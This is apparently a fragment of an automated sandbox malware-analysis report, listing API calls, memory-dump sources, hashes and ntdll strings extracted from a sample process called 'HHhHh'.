                                            control_flow_graph 265 40ace4-40ace5 266 40ad35-40ad4e call 41d2f0 call 41b4a0 265->266 267 40ace7-40aceb 265->267 273 40ad50-40ad64 LdrLoadDll 266->273 274 40ad67-40ad6a 266->274 267->266 273->274
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 1a4e4c258f6369eeebccb192aca4d5ed3026d76eb848f578d66d6bb6a398f8bf
                                            • Instruction ID: e8cccf4a5d31956354dd1af7ddd13c5c7436c72505274465b74679457c2b75a5
                                            • Opcode Fuzzy Hash: 1a4e4c258f6369eeebccb192aca4d5ed3026d76eb848f578d66d6bb6a398f8bf
                                            • Instruction Fuzzy Hash: 3FE065B5E00109AFDF00CBA5D842F9DB774AF1430CF048596E91896641E634E654CB96

                                            Control-flow Graph

                                            control_flow_graph 275 41a670-41a686 276 41a68c-41a6a1 RtlFreeHeap 275->276 277 41a687 call 41af60 275->277 277->276
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 2af3a5a0b7c0890712133d63cf391e116edaf29434828f094808a5287c780339
                                            • Instruction ID: 14e98c1b94af59478e92705a914c89d060e109eda8c600aff4353878b708b148
                                            • Opcode Fuzzy Hash: 2af3a5a0b7c0890712133d63cf391e116edaf29434828f094808a5287c780339
                                            • Instruction Fuzzy Hash: F8B09B719115D5C5DA12E764460C717794077D0701F56C061D3430651F4738C5D1E375
                                            Strings
                                            • The critical section is owned by thread %p., xrefs: 01348E69
                                            • *** then kb to get the faulting stack, xrefs: 01348FCC
                                            • write to, xrefs: 01348F56
                                            • <unknown>, xrefs: 01348D2E, 01348D81, 01348E00, 01348E49, 01348EC7, 01348F3E
                                            • This failed because of error %Ix., xrefs: 01348EF6
                                            • an invalid address, %p, xrefs: 01348F7F
                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 01348E02
                                            • *** An Access Violation occurred in %ws:%s, xrefs: 01348F3F
                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01348DB5
                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01348D8C
                                            • The resource is owned exclusively by thread %p, xrefs: 01348E24
                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01348E86
                                            • read from, xrefs: 01348F5D, 01348F62
                                            • The instruction at %p referenced memory at %p., xrefs: 01348EE2
                                            • *** enter .exr %p for the exception record, xrefs: 01348FA1
                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01348F2D
                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01348E4B
                                            • The instruction at %p tried to %s , xrefs: 01348F66
                                            • *** Inpage error in %ws:%s, xrefs: 01348EC8
                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01348F34
                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01348DC4
                                            • The resource is owned shared by %d threads, xrefs: 01348E2E
                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01348E3F
                                            • *** enter .cxr %p for the context, xrefs: 01348FBD
                                            • a NULL pointer, xrefs: 01348F90
                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01348FEF
                                            • Go determine why that thread has not released the critical section., xrefs: 01348E75
                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01348DA3
                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01348DD3
                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01348F26
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                            • API String ID: 0-108210295
                                            • Opcode ID: d0654006c7c0ad37c2977538e8b9f17eb2eae094324f2386c31833af2b70fe63
                                            • Instruction ID: 04c577fbeb9e47d7e74523b9f97b7d6b13185eec1f2867ea57e1bc759268287d
                                            • Opcode Fuzzy Hash: d0654006c7c0ad37c2977538e8b9f17eb2eae094324f2386c31833af2b70fe63
                                            • Instruction Fuzzy Hash: C5813879A11214BFDB25EA59DC45EAB3F79FF66B18F010088F6086F192E375D402CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2160512332
                                            • Opcode ID: 24f1b4f0952bb43eb08708dfb9f32ef690a851cd15850a3f5a59147ebce8846c
                                            • Instruction ID: 0fc3333dbbca26d73d3d8bb3d570a93a8f61728e1264de0fe42c84df7e998acd
                                            • Opcode Fuzzy Hash: 24f1b4f0952bb43eb08708dfb9f32ef690a851cd15850a3f5a59147ebce8846c
                                            • Instruction Fuzzy Hash: 9392C071614342AFE729DF28C880B6BBBE9BF84758F14482DFA94D7254D770E844CB92
                                            Strings
                                            • Critical section address, xrefs: 01305425, 013054BC, 01305534
                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01305543
                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013054E2
                                            • undeleted critical section in freed memory, xrefs: 0130542B
                                            • Critical section address., xrefs: 01305502
                                            • double initialized or corrupted critical section, xrefs: 01305508
                                            • Invalid debug info address of this critical section, xrefs: 013054B6
                                            • Address of the debug info found in the active list., xrefs: 013054AE, 013054FA
                                            • Critical section debug info address, xrefs: 0130541F, 0130552E
                                            • corrupted critical section, xrefs: 013054C2
                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0130540A, 01305496, 01305519
                                            • Thread identifier, xrefs: 0130553A
                                            • 8, xrefs: 013052E3
                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013054CE
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                            • API String ID: 0-2368682639
                                            • Opcode ID: d7ae462de9e5406728d1b6d46e0005ad4ff490e52644d770623a514a86ed5bb2
                                            • Instruction ID: 9e65db56ae2d5cfeba371cdfb10864e123798e127dd4ffd404af87f14a87ec84
                                            • Opcode Fuzzy Hash: d7ae462de9e5406728d1b6d46e0005ad4ff490e52644d770623a514a86ed5bb2
                                            • Instruction Fuzzy Hash: 2D817CB0A51349EFDB21CF99C855BAEBBF9EB08B14F104159F605B7680D3B1A940CF60
                                            Strings
                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013022E4
                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01302409
                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013024C0
                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01302412
                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01302506
                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01302498
                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01302624
                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013025EB
                                            • @, xrefs: 0130259B
                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0130261F
                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01302602
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                            • API String ID: 0-4009184096
                                            • Opcode ID: 12d7d5240a1587e07a82d1a5752edf2c72ab18b96278599ed75d03a2dccd28d2
                                            • Instruction ID: b31955b968c801820c95dc38b995983913b85e8a3bf18f7e124567df8d703984
                                            • Opcode Fuzzy Hash: 12d7d5240a1587e07a82d1a5752edf2c72ab18b96278599ed75d03a2dccd28d2
                                            • Instruction Fuzzy Hash: 02028FB1D102299BDB21DB54CC85BEAB7B8AB54704F0141EAE709B7281EB709F84CF59
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                            • API String ID: 0-2515994595
                                            • Opcode ID: e05c4b993090e2eecc96529dd570ad99ee2eee289c3257c0a4bc6924857be555
                                            • Instruction ID: 0352eae58d40986638e5b321f794d4ed7b8cccc401ec3abe90d9845aa47a023a
                                            • Opcode Fuzzy Hash: e05c4b993090e2eecc96529dd570ad99ee2eee289c3257c0a4bc6924857be555
                                            • Instruction Fuzzy Hash: F651EF711243469BC729DF18D848BABBBECEFD4748F140A5DB99883280E770D644CB96
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                            • API String ID: 0-3197712848
                                            • Opcode ID: 46dd20ad7b7d74c44abc63e530075a90af6a1ce41fd1964f4af7799c15c6704d
                                            • Instruction ID: 0a3ded36c5db6e74bd4341d00889e5b02eaaf11793d766404d6e9068b76a53fd
                                            • Opcode Fuzzy Hash: 46dd20ad7b7d74c44abc63e530075a90af6a1ce41fd1964f4af7799c15c6704d
                                            • Instruction Fuzzy Hash: A812E1716283428BD325DF28C481BBAF7E8FF94704F84492DFA858B291E775D944CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 0-1700792311
                                            • Opcode ID: 0511a85eba32ff29b153fb02d004781b9bc310f33c3a987fdadd13cf9032c3e3
                                            • Instruction ID: bbaf0b665c2b1c5d3043fa4cf11f59698c81407e221b6f0fc242f87dca5a399c
                                            • Opcode Fuzzy Hash: 0511a85eba32ff29b153fb02d004781b9bc310f33c3a987fdadd13cf9032c3e3
                                            • Instruction Fuzzy Hash: CDD1DF31610686DFDB2AEF68C440AEDBBF5FF49718F088049F6459BA92C734A980CF54
                                            Strings
                                            • HandleTraces, xrefs: 01318C8F
                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01318A67
                                            • VerifierFlags, xrefs: 01318C50
                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01318A3D
                                            • AVRF: -*- final list of providers -*- , xrefs: 01318B8F
                                            • VerifierDlls, xrefs: 01318CBD
                                            • VerifierDebug, xrefs: 01318CA5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                            • API String ID: 0-3223716464
                                            • Opcode ID: c6131d71e8c59ff5de29e04a873ab0f1cd42899675dc5d7c32a41b78178b5f85
                                            • Instruction ID: e6805654186587003e9d904db42cb1b95a0ae5048f9338e5d0c3b1cc7e0cd0ca
                                            • Opcode Fuzzy Hash: c6131d71e8c59ff5de29e04a873ab0f1cd42899675dc5d7c32a41b78178b5f85
                                            • Instruction Fuzzy Hash: D5914872641306DFE729EF6CC880B6BB7A8FB94B1CF044598FA406B258C730AC01C799
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                            • API String ID: 0-1109411897
                                            • Opcode ID: cdf3288be748f03a0fd3cbaa7268808e10105b87e6feb21e52d5a2fb1a1133ce
                                            • Instruction ID: e94a4a38a5e0565914cc70bdb19bc696642a71305314a102fb752005b7df62da
                                            • Opcode Fuzzy Hash: cdf3288be748f03a0fd3cbaa7268808e10105b87e6feb21e52d5a2fb1a1133ce
                                            • Instruction Fuzzy Hash: 08A23974A2566A8FDF64DF18CD887AAFBB5EF45304F1442E9DA09A7250DB709E80CF40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-792281065
                                            • Opcode ID: 69d6b38cd89cdefad499938e46497d907702653dfe8ab552bc0429138215b78d
                                            • Instruction ID: 5faef8c5868a483e81dfc1a52c3af4addfd505e470692d914d87ef4b8ebf059a
                                            • Opcode Fuzzy Hash: 69d6b38cd89cdefad499938e46497d907702653dfe8ab552bc0429138215b78d
                                            • Instruction Fuzzy Hash: EE91F470B20316DBEB3A9F58D955BAEBBE9EB50B18F14012CEB006B7C1D7B09941C791
                                            Strings
                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 012E9A01
                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 012E9A2A
                                            • apphelp.dll, xrefs: 01286496
                                            • LdrpInitShimEngine, xrefs: 012E99F4, 012E9A07, 012E9A30
                                            • minkernel\ntdll\ldrinit.c, xrefs: 012E9A11, 012E9A3A
                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 012E99ED
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-204845295
                                            • Opcode ID: fbcab64f2544538e63d790d5bfd56c6877a4cbaff67fd390b0ad72387338fbae
                                            • Instruction ID: e798344195f60692ed331a9ed32128667668a97fa08bceb6e8d48dc9ece8f8a4
                                            • Opcode Fuzzy Hash: fbcab64f2544538e63d790d5bfd56c6877a4cbaff67fd390b0ad72387338fbae
                                            • Instruction Fuzzy Hash: B951C3712793059FEB21EF24D845BAB77E8FF84748F40091EF585972A0D670E944CB92
                                            Strings
                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01302178
                                            • SXS: %s() passed the empty activation context, xrefs: 01302165
                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01302180
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013021BF
                                            • RtlGetAssemblyStorageRoot, xrefs: 01302160, 0130219A, 013021BA
                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0130219F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                            • API String ID: 0-861424205
                                            • Opcode ID: a5ab68d0d8470e19d5b6b630f5623d6f807c9853c1344170d6dd3bcbb40a3922
                                            • Instruction ID: 47adeec27b5e3bd599d445783729b85fa95a088c120bb45335cb3b626b71ee0a
                                            • Opcode Fuzzy Hash: a5ab68d0d8470e19d5b6b630f5623d6f807c9853c1344170d6dd3bcbb40a3922
                                            • Instruction Fuzzy Hash: 03314B3AF50225F7F7268A99CC99F6B7BB8DB54E44F05016DFB04A7180D6709A01C7A0
                                            Strings
                                            • LdrpInitializeProcess, xrefs: 012CC6C4
                                            • minkernel\ntdll\ldrinit.c, xrefs: 012CC6C3
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01308181, 013081F5
                                            • LdrpInitializeImportRedirection, xrefs: 01308177, 013081EB
                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 013081E5
                                            • Loading import redirection DLL: '%wZ', xrefs: 01308170
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-475462383
                                            • Opcode ID: 34341a7c446863a6efd6e3f97f257b986e322b9966ae85cd1429acf33ae3200a
                                            • Instruction ID: 28285615fbf423a014fbf0c789648c7c38632ebd71f8c6da68e8968a303e8b46
                                            • Opcode Fuzzy Hash: 34341a7c446863a6efd6e3f97f257b986e322b9966ae85cd1429acf33ae3200a
                                            • Instruction Fuzzy Hash: 1431F3717643429FD224EF2DE956E2B77D8EF94B18F00065CF944AB291E620EC04C7A2
                                            APIs
                                              • Part of subcall function 012D2DF0: LdrInitializeThunk.NTDLL ref: 012D2DFA
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012D0BA3
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012D0BB6
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012D0D60
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012D0D74
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                            • String ID:
                                            • API String ID: 1404860816-0
                                            • Opcode ID: 10914ebb7eb1d55ae0e3c4924ae24b19fde67addc3b0fdc18989a98065de1db4
                                            • Instruction ID: 37edebe61a6b459466235441679eb29b4a87d28cbd4c310e98bf7596093fa6fa
                                            • Opcode Fuzzy Hash: 10914ebb7eb1d55ae0e3c4924ae24b19fde67addc3b0fdc18989a98065de1db4
                                            • Instruction Fuzzy Hash: 34427E71910715DFDB21CF28C891BAAB7F4FF04314F1485A9E989DB292D770AA84CF60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                            • API String ID: 0-379654539
                                            • Opcode ID: 069f85cdd35210843a5ad90a3ccda124b36357930fb01b7681df0301a6078e44
                                            • Instruction ID: 25bcb53a5bd35c10b9d7a375e5394798345f63b77218f2d701e3fdd6dcc561cc
                                            • Opcode Fuzzy Hash: 069f85cdd35210843a5ad90a3ccda124b36357930fb01b7681df0301a6078e44
                                            • Instruction Fuzzy Hash: 29C15774628382CFDB21CF5CC144B6AB7E4FB85704F04896AFA958B291E774C949CB92
                                            Strings
                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 012C855E
                                            • LdrpInitializeProcess, xrefs: 012C8422
                                            • @, xrefs: 012C8591
                                            • minkernel\ntdll\ldrinit.c, xrefs: 012C8421
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
